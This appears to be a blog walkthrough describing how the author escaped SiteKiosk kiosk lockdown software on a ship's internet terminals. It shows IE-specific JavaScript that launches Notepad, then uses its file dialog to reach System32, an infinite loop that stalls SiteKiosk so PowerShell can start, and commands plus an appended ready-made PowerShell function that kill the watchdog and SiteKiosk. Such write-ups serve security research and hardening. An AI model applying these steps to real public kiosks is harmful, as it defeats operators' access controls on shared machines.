Bypassing SiteKiosk software
by Riley MacDonald, February 18, 2019

While exploring a boat during a trip I came across some internet kiosks that were locked down with SiteKiosk. I was not familiar with this software but quickly discovered that the functionality of the machines was severely limited. SiteKiosk is lockdown software used for safeguarding public-access Internet PCs, displays and tablets. It is designed to protect the browser and the operating system against manipulation: the user is kept inside a restricted browser, and the usual ways out (keyboard shortcuts, the desktop, launching other programs) are blocked.

SiteKiosk has a few known bypass techniques that abuse content the restricted browser still renders, including JavaScript, Flash and PDF. I chose to attempt a bypass via JavaScript.

Executing javascript
Fortunately both the W3C Try it out widget and the jsfiddle website were accessible, and JavaScript execution was not blocked in the browser instance. This allowed me to write, debug and execute JavaScript live within the browser without the need to upload anything to the internet. From the look of the user interface I could tell that the machine was running Windows and that the restricted browser appeared to be an instance of Internet Explorer (SiteKiosk's browser is built on the IE engine), which is what makes the IE-specific APIs used below available.

Exploiting SiteKiosk using javascript
Using the W3C Try it out widget I ran the following JavaScript code:

<!DOCTYPE html>
<html>
 
<script>
// MSBlobBuilder and msSaveOrOpenBlob are Internet Explorer 10+ specific APIs.
blobBuilder = new MSBlobBuilder();
blobBuilder.append("appended data");
// Prompts the user to open or save the blob as textFile.txt.
window.navigator.msSaveOrOpenBlob(blobBuilder.getBlob(), "textFile.txt");
</script>
 
<body>
The content of the body element is displayed in your browser.
</body>
 
</html>

This code creates an MSBlobBuilder object and appends the string "appended data" to it. window.navigator.msSaveOrOpenBlob() is an Internet Explorer-specific API that prompts the user to save the blob to disk or open it; choosing Open hands the file to the system's default handler for .txt files (since we know this is Windows, it is safe to assume this will be Notepad). The point is not the file contents: it is that a native application outside the kiosk browser gets launched.

Navigating Files
Once Notepad was open I was able to use File -> Save As to open a standard Explorer file dialog, which is effectively a small file manager. I was able to navigate to System32 by entering shell:system into the dialog's address bar, and I was also able to save the file into System32, so the dialog was running with write access there.

Launching Powershell
Back in Notepad I used Save As again. In an attempt to open a PowerShell instance I dragged textFile.txt onto powershell.exe in the dialog (dropping a file onto an executable launches it with the file path as an argument). Unfortunately SiteKiosk was still running and immediately blocked the new process from executing.

Locking SiteKiosk
SiteKiosk needs to be taken out of the picture in order to launch PowerShell. This can be accomplished by executing an infinite JavaScript loop in the kiosk browser: the browser hangs, and after roughly 30 seconds the watchdog decides SiteKiosk is unresponsive and restarts it. During that window SiteKiosk is not enforcing its process restrictions. I headed back over to the W3C widget and appended an infinite loop to the JavaScript code:

for (;;) {}

Before running the code be sure the Save As dialog in Notepad is open and that you are able to grab the Notepad window with your mouse, as keyboard shortcuts such as ctrl+tab are blocked. After running the code, quickly drag textFile.txt onto powershell.exe. Once SiteKiosk restarts you should have an instance of PowerShell open.

Killing SiteKiosk
Using the PowerShell instance, SiteKiosk and watchdog (the process which restarts SiteKiosk) can be killed. Using PowerShell, find the process ids with Get-Process (the ids below are illustrative; use the ones from your own listing):

PS> Get-Process
 
Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
      0       0        0         16     0              12 sitekiosk
      0       0        0         16     0              13 watchdog

Kill both processes using Stop-Process with the ids from above, watchdog first, otherwise it will simply relaunch SiteKiosk:

PS> Stop-Process -Id 13 -Force; Stop-Process -Id 12 -Force

SiteKiosk should now be stopped leaving you with a Powershell instance.
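The same kill sequence written as a small PowerShell function, as an added example that is not part of the original post. It looks the processes up by name rather than hard-coded ids, stops the watchdog before SiteKiosk, handles the case where the kiosk user lacks the right to terminate them, and waits a few seconds to confirm nothing was respawned. The process names come from the Get-Process listing above; the settle time and the function name are assumptions.

```powershell
# Added example (not from the original post): stop the SiteKiosk watchdog and
# then SiteKiosk itself by process name, then verify that neither came back.
# Process names are those shown in the Get-Process listing above; the settle
# time is an assumed value.
function Stop-KioskLockdown {
    param(
        # Order matters: the watchdog must die first or it will relaunch sitekiosk.
        [string[]]$ProcessNames = @('watchdog', 'sitekiosk'),
        [int]$SettleSeconds = 5
    )

    foreach ($name in $ProcessNames) {
        $procs = Get-Process -Name $name -ErrorAction SilentlyContinue
        if (-not $procs) {
            Write-Host "No running process named $name"
            continue
        }
        foreach ($p in $procs) {
            Write-Host ("Stopping {0} (PID {1})" -f $p.ProcessName, $p.Id)
            try {
                Stop-Process -Id $p.Id -Force -ErrorAction Stop
            }
            catch {
                # Typical failure mode: the kiosk account is not allowed to
                # terminate a process running as a different (service) user.
                Write-Warning ("Could not stop {0} (PID {1}): {2}" -f $p.ProcessName, $p.Id, $_.Exception.Message)
                return $false
            }
        }
    }

    # Give a surviving watchdog time to relaunch SiteKiosk, then re-check.
    Start-Sleep -Seconds $SettleSeconds
    $survivors = Get-Process -Name $ProcessNames -ErrorAction SilentlyContinue
    if ($survivors) {
        Write-Warning ("Still running: " + (($survivors | ForEach-Object ProcessName) -join ', ') + "; a watchdog may have respawned it")
        return $false
    }

    Write-Host "SiteKiosk and watchdog are stopped"
    return $true
}

Stop-KioskLockdown
```

If the function returns $false because Stop-Process was denied, the kiosk software is running under a different account than the browser session and this particular bypass stops at the PowerShell prompt; the remaining steps of the post assume the kiosk user can terminate both processes.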
